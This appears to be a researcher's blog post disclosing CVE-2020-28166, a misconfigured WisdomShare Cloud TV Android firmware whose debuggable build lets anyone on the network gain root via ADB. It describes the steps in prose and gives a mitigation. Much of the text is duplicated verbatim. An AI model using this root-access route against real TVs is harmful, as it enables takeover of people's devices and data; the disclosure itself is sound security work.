Open in app

Sign in

Write

Sign in

Tale of CVE-2020–28166

Bugsbunnyy
7 min readMay 12, 2021

It is estimated that by the end of 2025, there will be 55.75B IoT Devices, creating connectivity of smart appliances, smart grids, self-driving cars, and many more. In a world full of these IoT devices and smart innovations, can we really say that we’re secure from cyber attacks?

Today most of us have smart devices in our homes ranging from simple smart doorbells to smart AC’s and TV’s. Almost all of the Smart TV’s now sit on Android Operating System but a lot of vendors actually use unpatched and vulnerable OS with escalated privileges.

Sometime back I started research on Android TV’s which are using modified versions of Android Operating System. Most of them are manufactured and assembled in China. Although they come with a plethora of features and functionalities, but still they are vulnerable to most of the cyber attacks. My Smart TV was using WisdomShare Cloud TV Android modified version and as good as it looks to have a Smart Cloud TV in you house, the possibilities of hacking them are endless.

In this blog, I will be detailing one such vulnerability I found in my smart TV, that can have a devastating effect if left unsecured.

What is CVE-2020–28166 Vulnerability about?

Smart TVs are computers just like your phones and laptop, and they are all susceptible to one or other attacks. In this section I will be detailing the vulnerability I found in smart TV, that can have a devastating effect if left unsecured.

My Smart TV is equipped with a WisdomShare Cloud TV Android modified version. As good as it may seem, it is vulnerable to one or the other attack. While I was playing around with my TV I found a way to exploit it, resulting in my sensitive details such as passwords, privacy, access being available to anyone within the network, or root access. I was able to use Android Debug Bridge (ADB) to gain root access to the smart TV.

What is Android Debug Bridge (ADB)?

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. The ADB command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device. It is a client-server program that includes three components:

Client

Client devices are the devices on which the ADB will execute the commands to produce the desired output. It sends commands. The client runs on your development machine. You can invoke a client from a command-line terminal by issuing an ADB command.

ADB Daemon (ADBD)

A daemon is a client-side program that runs the commands entered on the development machine. A daemon (adbd), runs commands on a device. The daemon runs as a background process on each device.

What is CVE-2020–28166 Vulnerability about?

Smart TVs are computers just like your phones and laptop, and they are all susceptible to one or other attacks. In this section I will be detailing the vulnerability I found in smart TV, that can have a devastating effect if left unsecured.

My Smart TV is equipped with a WisdomShare Cloud TV Android modified version. As good as it may seem, it is vulnerable to one or the other attack. While I was playing around with my TV I found a way to exploit it, resulting in my sensitive details such as passwords, privacy, access being available to anyone within the network, or root access. I was able to use Android Debug Bridge (ADB) to gain root access to the smart TV.

What is Android Debug Bridge (ADB)?

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. The ADB command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device. It is a client-server program that includes three components:

Client

Client devices are the devices on which the ADB will execute the commands to produce the desired output. It sends commands. The client runs on your development machine. You can invoke a client from a command-line terminal by issuing an ADB command.

ADB Daemon (ADBD)

A daemon is a client-side program that runs the commands entered on the development machine. A daemon (adbd), runs commands on a device. The daemon runs as a background process on each device.

Server

A server manages communication between the client and the daemon. The server runs as a background process on your development machine.

The Exploit

Step 1

Using the ADB command, android devices were fetched.

Step 2

Upon encountering my device listing, an attempt to run ADB root was conducted, which was a success.

Step 3

It was shocking to see how easy it was to run ADB root, as the device lacked basic USB debugging permission or any security in place.

Step 4

To reconfirm, an ID command was performed to check all the root users, which enabled detecting all the sensitive data of root users.

Why did this happen?

The vulnerability happened because the firmware was released with misconfiguration. The developers have uploaded the ‘userdebug’ build which allows users to run as root.

Upon further investigation, we discovered that the ‘ro.debuggable’ flag had been set to ‘1’. This allows the user to operate in the engineering or debug build by default and access the device on the ADB root command.

Many Android TV Devices are actually doing these things, pushing all vulnerable Android Operating System versions to TV, putting consumers at risk.

How can this vulnerability be exploited?

Cybercriminals who can manage to locate the IoT device through the ADB command will be able to access, view, and modify the system through Remote Code Execution (RCE).

  1. Any attacker within your network can view and exploit your sensitive data
  2. It can also lead to total device control

Successfully exploiting CVE-2020–28166 can lead to RCE. In this case, it can allow hackers and threat actors to take over IoT devices. This allows attackers to steal, delete, add, or overwrite content, embed them with malware, or use them as doorways into other systems or servers connected to it.

How to Mitigate?

Many Android devices are following the practice of running on debug build possibly, to provide smoother plug-and-play experiences for the average user. However, this puts the user’s sensitive data at significant risk from cybercriminals, lurking around to exploit every vulnerability.

When it comes to exploiting CVE-2020–28166, the CVE vulnerability that i have elaborated on through this article, the easy fix is that the ro.debuggable flag should be set to 0 in default.prop

The Exploit

Step 1

Using the ADB command, android devices were fetched.

Step 2

Upon encountering my device listing, an attempt to run ADB root was conducted, which was a success.

Step 3

It was shocking to see how easy it was to run ADB root, as the device lacked basic USB debugging permission or any security in place.

Step 4

To reconfirm, an ID command was performed to check all the root users, which enabled detecting all the sensitive data of root users.

Why did this happen?

The vulnerability happened because the firmware was released with misconfiguration. The developers have uploaded the ‘userdebug’ build which allows users to run as root.

Upon further investigation, we discovered that the ‘ro.debuggable’ flag had been set to ‘1’. This allows the user to operate in the engineering or debug build by default and access the device on the ADB root command.

Many Android TV Devices are actually doing these things, pushing all vulnerable Android Operating System versions to TV, putting consumers at risk.

How can this vulnerability be exploited?

Cybercriminals who can manage to locate the IoT device through the ADB command will be able to access, view, and modify the system through Code Execution.

  1. Any attacker within your network can view and exploit your sensitive data
  2. It can also lead to total device control

Successfully exploiting CVE-2020–28166 can lead to whole compromise of the system. In this case, it can allow hackers and threat actors to take over IoT devices. This allows attackers to steal, delete, add, or overwrite content, embed them with malware, or use them as doorways into other systems or servers connected to it.

How to Mitigate?

Many Android devices are following the practice of running on debug build possibly, to provide smoother plug-and-play experiences for the average user. However, this puts the user’s sensitive data at significant risk from cybercriminals, lurking around to exploit every vulnerability.

When it comes to exploiting CVE-2020–28166, the CVE vulnerability that i have elaborated on through this article, the easy fix is that the ro.debuggable flag should be set to 0 in default.prop

Video Link-https://youtu.be/ZqDI5MZEjzs

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Smart Devices
Cve
Hacking
Smart Tv

Bugsbunnyy
Bugsbunnyy

Written by Bugsbunnyy

8 Followers
2 Following

Security Researcher

No responses yet

Write a response

What are your thoughts?

More from Bugsbunnyy

See all from Bugsbunnyy

Recommended from Medium

Lists

Staff picks

827 stories1648 saves

Stories to Help You Level-Up at Work

19 stories948 saves

Self-Improvement 101

20 stories3355 saves

Productivity 101

20 stories2818 saves
See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams